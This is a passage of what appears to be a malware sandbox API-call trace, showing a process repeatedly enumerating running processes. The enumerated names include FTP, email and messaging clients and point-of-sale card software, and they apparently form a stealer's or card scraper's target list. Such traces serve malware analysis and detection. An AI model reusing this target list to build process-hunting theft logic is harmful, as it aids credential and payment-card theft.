szExeFile="evening.exe")) returned 1 [0292.977] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0292.978] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0292.979] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0292.981] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0292.982] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0292.984] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0292.985] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0292.987] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0292.988] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0292.989] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0292.991] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0292.992] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0292.993] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0292.995] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0292.996] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0292.998] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0292.999] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0293.001] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0293.003] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0293.004] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0293.006] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0293.008] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0293.010] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0293.011] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0293.061] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0293.063] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0293.064] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0293.066] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0293.068] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0293.069] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0293.071] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0293.072] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0293.074] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0293.076] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0293.078] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0293.079] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0293.081] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0293.082] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0293.084] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0293.085] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0293.087] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0293.089] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0293.090] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0293.092] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0293.093] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0293.095] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0293.096] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0293.098] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0293.099] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0293.101] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0293.102] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0293.104] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0293.127] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0293.129] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0293.130] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0293.132] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0293.133] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0293.135] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0293.136] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0293.145] CloseHandle (hObject=0x2170) returned 1 [0293.145] Sleep (dwMilliseconds=0x64) [0293.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0293.291] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.292] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0293.294] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0293.295] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.297] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0293.298] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.300] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0293.301] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0293.302] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0293.304] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.305] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.306] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0293.308] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.309] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.311] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.312] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.314] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.315] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.316] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.318] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0293.319] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0293.321] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0293.322] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0293.323] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, 